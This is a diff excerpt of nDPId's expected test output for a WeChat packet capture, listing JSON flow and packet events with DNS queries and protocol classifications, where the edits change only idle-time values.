-00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1590,"source":"wechat.pcap","alias":"nDPId-test","flow_id":89,"flow_packet_id":2,"flow_last_seen":1492171177380,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1492171177380,"pkt":"8IQvSpdgeJKcD6iOCABFAAA0e6BAAEAGnZvAqAFny82Tq+NyAbsh7o58Fu1nsYARAOW0WAAAAQEICgA\/UK9F3\/Tx"} +00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1574,"source":"wechat.pcap","alias":"nDPId-test","flow_id":87,"flow_packet_id":2,"flow_last_seen":1492171177004,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1492171177004,"pkt":"8IQvSpdgeJKcD6iOCABFAAA01BhAAEAGIxXAqAFnX2UiIpkbAFBTLvPZ9eqaX4ARCgvXsQAAAQEICgA\/UFFwfB+e"} +00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1575,"source":"wechat.pcap","alias":"nDPId-test","flow_id":79,"flow_packet_id":3,"flow_last_seen":1492171177012,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1492171177012,"pkt":"8IQvSpdgeJKcD6iOCABFAAA0HRdAAEAG2hbAqAFnX2UiIpknAFAjQjGaFOMj7IARBf68nAAAAQEICgA\/UFNwfIhZ"} +00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1576,"source":"wechat.pcap","alias":"nDPId-test","flow_id":80,"flow_packet_id":3,"flow_last_seen":1492171177024,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1492171177024,"pkt":"8IQvSpdgeJKcD6iOCABFAAA0\/7BAAEAG933AqAFnX2UiIYi0AFB\/4ffl18M9+4ARCyPk0AAAAQEICgA\/UFZr6XAp"} +00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1577,"source":"wechat.pcap","alias":"nDPId-test","flow_id":82,"flow_packet_id":3,"flow_last_seen":1492171177024,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1492171177024,"pkt":"8IQvSpdgeJKcD6iOCABFAAA0R7xAAEAGr3LAqAFnX2UiIYi4AFDlnJriImFMS4ARCdyC7gAAAQEICgA\/UFZr6XGp"} +00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1578,"source":"wechat.pcap","alias":"nDPId-test","flow_id":83,"flow_packet_id":3,"flow_last_seen":1492171177028,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1492171177028,"pkt":"8IQvSpdgeJKcD6iOCABFAAA00npAAEAGJLPAqAFnX2UiIpk\/AFBMVGJQaE9vZoARBU64AQAAAQEICgA\/UFdwfJTZ"} +00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1579,"source":"wechat.pcap","alias":"nDPId-test","flow_id":84,"flow_packet_id":3,"flow_last_seen":1492171177032,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1492171177032,"pkt":"8IQvSpdgeJKcD6iOCABFAAA0JkVAAEAG0OnAqAFnX2UiIYilAFA23DHogeAL9oARBaR6RwAAAQEICgA\/UFhr6Xcq"} +00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1580,"source":"wechat.pcap","alias":"nDPId-test","flow_id":81,"flow_packet_id":3,"flow_last_seen":1492171177040,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1492171177040,"pkt":"8IQvSpdgeJKcD6iOCABFAAA0jqZAAEAGaIjAqAFnX2UiIYi3AFBZ1tli3d8I5IARBaRdUgAAAQEICgA\/UFpr6XCp"} +00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1581,"source":"wechat.pcap","alias":"nDPId-test","flow_id":88,"flow_packet_id":2,"flow_last_seen":1492171177040,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1492171177040,"pkt":"8IQvSpdgeJKcD6iOCABFAAA0255AAEAGiP3AqAFnX2W0s8s0AFCaGNVHW3dgu4ARJJf1FQAAAQEICgA\/UFoc0iJk"} +00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1582,"source":"wechat.pcap","alias":"nDPId-test","flow_id":87,"flow_packet_id":3,"flow_last_seen":1492171177240,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1492171177240,"pkt":"8IQvSpdgeJKcD6iOCABFAAA01BlAAEAGIxTAqAFnX2UiIpkbAFBTLvPZ9eqaX4ARCgvXdgAAAQEICgA\/UIxwfB+e"} +00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1589,"source":"wechat.pcap","alias":"nDPId-test","flow_id":88,"flow_packet_id":3,"flow_last_seen":1492171177308,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1492171177308,"pkt":"8IQvSpdgeJKcD6iOCABFAAA0259AAEAGiPzAqAFnX2W0s8s0AFCaGNVHW3dgu4ARJJf00gAAAQEICgA\/UJ0c0iJk"} +00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1590,"source":"wechat.pcap","alias":"nDPId-test","flow_id":89,"flow_packet_id":2,"flow_last_seen":1492171177380,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1492171177380,"pkt":"8IQvSpdgeJKcD6iOCABFAAA0e6BAAEAGnZvAqAFny82Tq+NyAbsh7o58Fu1nsYARAOW0WAAAAQEICgA\/UK9F3\/Tx"} 00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1591,"source":"wechat.pcap","alias":"nDPId-test","flow_id":91,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492171177429,"flow_last_seen":1492171177429,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1492171177429,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"192.168.1.254","src_port":43317,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00491{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1591,"source":"wechat.pcap","alias":"nDPId-test","flow_id":91,"flow_packet_id":1,"flow_last_seen":1492171177429,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":82,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":82,"pkt_l4_len":48,"thread_ts_msec":1492171177429,"pkt":"8IQvSpdgeJKcD6iOCABFAABE+fFAAEARvAHAqAFnwKgB\/qk1ADUAMHHYjFIBAAABAAAAAAAAB3dlYnB1c2gDd2ViBndlY2hhdANjb20AAAEAAQ=="} 00774{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1591,"source":"wechat.pcap","alias":"nDPId-test","flow_id":91,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492171177429,"flow_last_seen":1492171177429,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1492171177429,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"192.168.1.254","src_port":43317,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.WeChat","breed":"Fun","category":"Chat"},"dns": {"query":"webpush.web.wechat.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} -00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1600,"source":"wechat.pcap","alias":"nDPId-test","flow_id":89,"flow_packet_id":3,"flow_last_seen":1492171178268,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1492171178268,"pkt":"8IQvSpdgeJKcD6iOCABFAAA0e6FAAEAGnZrAqAFny82Tq+NyAbsh7o58Fu1nsYARAOWzegAAAQEICgA\/UY1F3\/Tx"} +00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1600,"source":"wechat.pcap","alias":"nDPId-test","flow_id":89,"flow_packet_id":3,"flow_last_seen":1492171178268,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1492171178268,"pkt":"8IQvSpdgeJKcD6iOCABFAAA0e6FAAEAGnZrAqAFny82Tq+NyAbsh7o58Fu1nsYARAOWzegAAAQEICgA\/UY1F3\/Tx"} 00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1603,"source":"wechat.pcap","alias":"nDPId-test","flow_id":92,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492171178741,"flow_last_seen":1492171178741,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1492171178741,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"192.168.1.254","src_port":56367,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00491{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1603,"source":"wechat.pcap","alias":"nDPId-test","flow_id":92,"flow_packet_id":1,"flow_last_seen":1492171178741,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":82,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":82,"pkt_l4_len":48,"thread_ts_msec":1492171178741,"pkt":"8IQvSpdgeJKcD6iOCABFAABE+rRAAEARuz7AqAFnwKgB\/twvADUAMPgq0wUBAAABAAAAAAAAB3dlYnB1c2gDd2ViBndlY2hhdANjb20AAAEAAQ=="} 00774{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1603,"source":"wechat.pcap","alias":"nDPId-test","flow_id":92,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492171178741,"flow_last_seen":1492171178741,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1492171178741,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"192.168.1.254","src_port":56367,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.WeChat","breed":"Fun","category":"Chat"},"dns": {"query":"webpush.web.wechat.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} @@ -574,7 +574,7 @@ 00520{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1639,"source":"wechat.pcap","alias":"nDPId-test","flow_id":99,"flow_packet_id":2,"flow_last_seen":1492171250302,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":102,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":102,"pkt_l4_len":48,"thread_ts_msec":1492171250302,"pkt":"MzMAAAD7eJKcD6iOht1gAAAAADARAf6AAAAAAAAAepKc\/\/4PqI7\/AgAAAAAAAAAAAAAAAAD7FOkU6QAwzvQAAAAAAAEAAAAAAAALX2dvb2dsZWNhc3QEX3RjcAVsb2NhbAAADAAB"} 00490{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1640,"source":"wechat.pcap","alias":"nDPId-test","flow_id":98,"flow_packet_id":3,"flow_last_seen":1492171251303,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":82,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":82,"pkt_l4_len":48,"thread_ts_msec":1492171251303,"pkt":"AQBeAAD7eJKcD6iOCABFAABESy5AAAERi3DAqAFn4AAA+xTpFOkAMOiYAAAAAAABAAAAAAAAC19nb29nbGVjYXN0BF90Y3AFbG9jYWwAAAwAAQ=="} 00520{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1641,"source":"wechat.pcap","alias":"nDPId-test","flow_id":99,"flow_packet_id":3,"flow_last_seen":1492171251303,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":102,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":102,"pkt_l4_len":48,"thread_ts_msec":1492171251303,"pkt":"MzMAAAD7eJKcD6iOht1gAAAAADARAf6AAAAAAAAAepKc\/\/4PqI7\/AgAAAAAAAAAAAAAAAAD7FOkU6QAwzvQAAAAAAAEAAAAAAAALX2dvb2dsZWNhc3QEX3RjcAVsb2NhbAAADAAB"} -01072{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1644,"source":"wechat.pcap","alias":"nDPId-test","flow_id":86,"flow_packet_id":2,"flow_last_seen":1492171267294,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":506,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":506,"pkt_l4_len":472,"thread_ts_msec":1492171267294,"pkt":"8IQvSpdgeJKcD6iOCABFAAHsiFZAAEAGSOjAqAFn2DrNg+MfAbtA+v0gFZsbqIAZAT5FiAAAAQEICgA\/pcIy2r7tFwMDAVu+DrsMGADIBc3y\/EPKacgY\/\/yQnIvMDmcJvSRFqPEzGFHK1SfEZD+LW3zHqz7Qn57h7phszvLaMx08coFwWwqfC7HwO5byX8EfZX59ZxB8wie5NmTqPueQB2i63JLDDRRwIsZojgu7bb8cvUD8n10qxsHw\/TQ7hvwnvUlAMmevC0E4bShoN6nD161aFH8pJzOUZ6Inmm16pW110QaYPjjSQQTv7tNyG48jYK3I2RN01WazUewIpPm73LAS9ZABJ\/Ny8oNO\/paZaboPssOjLQcJQCoLWCEO29VIR1wHqlyW4rcdBB9JM36yEvABpD0B99LA+t3vBjUOLhPnYTS5Tg\/Xq\/y13A\/nE4U69mAQajAphd1rkHRmU5H71D9Yn3KgSrb0XGlqT0xKmBjYerOwAP2kk8Whxm\/8laMcKMQksDAjrijAvnUEJ5tIwpNFUcxgRKcVbexJ8LEa9dte0xcDAwAh3EhrcW9cp9\/WX9UiN8Kt\/CmhJWgGaSyh5LdY3zetl0V+FwMDAC1uKRpL0WFRctIQnQp7DT13au9uAW\/kc9Ado7SqH0KYC9BoecHEhGyhydVqz38="} +01072{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1644,"source":"wechat.pcap","alias":"nDPId-test","flow_id":86,"flow_packet_id":2,"flow_last_seen":1492171267294,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":506,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":506,"pkt_l4_len":472,"thread_ts_msec":1492171267294,"pkt":"8IQvSpdgeJKcD6iOCABFAAHsiFZAAEAGSOjAqAFn2DrNg+MfAbtA+v0gFZsbqIAZAT5FiAAAAQEICgA\/pcIy2r7tFwMDAVu+DrsMGADIBc3y\/EPKacgY\/\/yQnIvMDmcJvSRFqPEzGFHK1SfEZD+LW3zHqz7Qn57h7phszvLaMx08coFwWwqfC7HwO5byX8EfZX59ZxB8wie5NmTqPueQB2i63JLDDRRwIsZojgu7bb8cvUD8n10qxsHw\/TQ7hvwnvUlAMmevC0E4bShoN6nD161aFH8pJzOUZ6Inmm16pW110QaYPjjSQQTv7tNyG48jYK3I2RN01WazUewIpPm73LAS9ZABJ\/Ny8oNO\/paZaboPssOjLQcJQCoLWCEO29VIR1wHqlyW4rcdBB9JM36yEvABpD0B99LA+t3vBjUOLhPnYTS5Tg\/Xq\/y13A\/nE4U69mAQajAphd1rkHRmU5H71D9Yn3KgSrb0XGlqT0xKmBjYerOwAP2kk8Whxm\/8laMcKMQksDAjrijAvnUEJ5tIwpNFUcxgRKcVbexJ8LEa9dte0xcDAwAh3EhrcW9cp9\/WX9UiN8Kt\/CmhJWgGaSyh5LdY3zetl0V+FwMDAC1uKRpL0WFRctIQnQp7DT13au9uAW\/kc9Ado7SqH0KYC9BoecHEhGyhydVqz38="} 00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1645,"source":"wechat.pcap","alias":"nDPId-test","flow_id":100,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492171267294,"flow_last_seen":1492171267294,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1492171267294,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"192.168.1.254","src_port":45366,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00492{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1645,"source":"wechat.pcap","alias":"nDPId-test","flow_id":100,"flow_packet_id":1,"flow_last_seen":1492171267294,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":82,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":82,"pkt_l4_len":48,"thread_ts_msec":1492171267294,"pkt":"8IQvSpdgeJKcD6iOCABFAABEJBJAAEARkeHAqAFnwKgB\/rE2ADUAMGKHk6IBAAABAAAAAAAAB3dlYnB1c2gDd2ViBndlY2hhdANjb20AAAEAAQ=="} 00775{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1645,"source":"wechat.pcap","alias":"nDPId-test","flow_id":100,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492171267294,"flow_last_seen":1492171267294,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1492171267294,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"192.168.1.254","src_port":45366,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.WeChat","breed":"Fun","category":"Chat"},"dns": {"query":"webpush.web.wechat.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} @@ -584,7 +584,7 @@ 00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1651,"source":"wechat.pcap","alias":"nDPId-test","flow_id":102,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492171268427,"flow_last_seen":1492171268427,"flow_idle_time":180000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":37,"flow_tot_l4_payload_len":37,"flow_avg_l4_payload_len":37,"midstream":0,"thread_ts_msec":1492171268427,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"192.168.1.254","src_port":42074,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00488{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1651,"source":"wechat.pcap","alias":"nDPId-test","flow_id":102,"flow_packet_id":1,"flow_last_seen":1492171268427,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":79,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":79,"pkt_l4_len":45,"thread_ts_msec":1492171268427,"pkt":"8IQvSpdgeJKcD6iOCABFAABBJl5AAEARj5jAqAFnwKgB\/qRaADUALSfRFz8BAAABAAAAAAAAA3NzbAdnc3RhdGljA2NvbQNsYW4AAAEAAQ=="} 00775{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1651,"source":"wechat.pcap","alias":"nDPId-test","flow_id":102,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492171268427,"flow_last_seen":1492171268427,"flow_idle_time":180000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":37,"flow_tot_l4_payload_len":37,"flow_avg_l4_payload_len":37,"midstream":0,"thread_ts_msec":1492171268427,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"192.168.1.254","src_port":42074,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"ssl.gstatic.com.lan","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} -01072{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1653,"source":"wechat.pcap","alias":"nDPId-test","flow_id":86,"flow_packet_id":3,"flow_last_seen":1492171268600,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":506,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":506,"pkt_l4_len":472,"thread_ts_msec":1492171268600,"pkt":"8IQvSpdgeJKcD6iOCABFAAHsiFdAAEAGSOfAqAFn2DrNg+MfAbtA+v0gFZsbqIAZAT5BhgAAAQEICgA\/qcQy2r7tFwMDAVu+DrsMGADIBc3y\/EPKacgY\/\/yQnIvMDmcJvSRFqPEzGFHK1SfEZD+LW3zHqz7Qn57h7phszvLaMx08coFwWwqfC7HwO5byX8EfZX59ZxB8wie5NmTqPueQB2i63JLDDRRwIsZojgu7bb8cvUD8n10qxsHw\/TQ7hvwnvUlAMmevC0E4bShoN6nD161aFH8pJzOUZ6Inmm16pW110QaYPjjSQQTv7tNyG48jYK3I2RN01WazUewIpPm73LAS9ZABJ\/Ny8oNO\/paZaboPssOjLQcJQCoLWCEO29VIR1wHqlyW4rcdBB9JM36yEvABpD0B99LA+t3vBjUOLhPnYTS5Tg\/Xq\/y13A\/nE4U69mAQajAphd1rkHRmU5H71D9Yn3KgSrb0XGlqT0xKmBjYerOwAP2kk8Whxm\/8laMcKMQksDAjrijAvnUEJ5tIwpNFUcxgRKcVbexJ8LEa9dte0xcDAwAh3EhrcW9cp9\/WX9UiN8Kt\/CmhJWgGaSyh5LdY3zetl0V+FwMDAC1uKRpL0WFRctIQnQp7DT13au9uAW\/kc9Ado7SqH0KYC9BoecHEhGyhydVqz38="} +01072{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1653,"source":"wechat.pcap","alias":"nDPId-test","flow_id":86,"flow_packet_id":3,"flow_last_seen":1492171268600,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":506,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":506,"pkt_l4_len":472,"thread_ts_msec":1492171268600,"pkt":"8IQvSpdgeJKcD6iOCABFAAHsiFdAAEAGSOfAqAFn2DrNg+MfAbtA+v0gFZsbqIAZAT5BhgAAAQEICgA\/qcQy2r7tFwMDAVu+DrsMGADIBc3y\/EPKacgY\/\/yQnIvMDmcJvSRFqPEzGFHK1SfEZD+LW3zHqz7Qn57h7phszvLaMx08coFwWwqfC7HwO5byX8EfZX59ZxB8wie5NmTqPueQB2i63JLDDRRwIsZojgu7bb8cvUD8n10qxsHw\/TQ7hvwnvUlAMmevC0E4bShoN6nD161aFH8pJzOUZ6Inmm16pW110QaYPjjSQQTv7tNyG48jYK3I2RN01WazUewIpPm73LAS9ZABJ\/Ny8oNO\/paZaboPssOjLQcJQCoLWCEO29VIR1wHqlyW4rcdBB9JM36yEvABpD0B99LA+t3vBjUOLhPnYTS5Tg\/Xq\/y13A\/nE4U69mAQajAphd1rkHRmU5H71D9Yn3KgSrb0XGlqT0xKmBjYerOwAP2kk8Whxm\/8laMcKMQksDAjrijAvnUEJ5tIwpNFUcxgRKcVbexJ8LEa9dte0xcDAwAh3EhrcW9cp9\/WX9UiN8Kt\/CmhJWgGaSyh5LdY3zetl0V+FwMDAC1uKRpL0WFRctIQnQp7DT13au9uAW\/kc9Ado7SqH0KYC9BoecHEhGyhydVqz38="} 00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1654,"source":"wechat.pcap","alias":"nDPId-test","flow_id":103,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492171268754,"flow_last_seen":1492171268754,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1492171268754,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"192.168.1.254","src_port":43705,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00496{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1654,"source":"wechat.pcap","alias":"nDPId-test","flow_id":103,"flow_packet_id":1,"flow_last_seen":1492171268754,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1492171268754,"pkt":"8IQvSpdgeJKcD6iOCABFAABIJm1AAEARj4LAqAFnwKgB\/qq5ADUANAzJFXEBAAABAAAAAAAAB3dlYnB1c2gDd2ViBndlY2hhdANjb20DbGFuAAABAAE="} 00782{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1654,"source":"wechat.pcap","alias":"nDPId-test","flow_id":103,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492171268754,"flow_last_seen":1492171268754,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1492171268754,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"192.168.1.254","src_port":43705,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"webpush.web.wechat.com.lan","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} @@ -615,38 +615,38 @@ 00777{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1669,"source":"wechat.pcap","alias":"nDPId-test","flow_id":109,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492171290232,"flow_last_seen":1492171290232,"flow_idle_time":180000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":39,"flow_avg_l4_payload_len":39,"midstream":0,"thread_ts_msec":1492171290232,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"192.168.1.254","src_port":41759,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"2.debian.pool.ntp.org","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00488{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1670,"source":"wechat.pcap","alias":"nDPId-test","flow_id":109,"flow_packet_id":2,"flow_last_seen":1492171290232,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":81,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":81,"pkt_l4_len":47,"thread_ts_msec":1492171290232,"pkt":"8IQvSpdgeJKcD6iOCABFAABDMalAAEARhEvAqAFnwKgB\/qMfADUAL1ZyUSMBAAABAAAAAAAAATIGZGViaWFuBHBvb2wDbnRwA29yZwAAHAAB"} 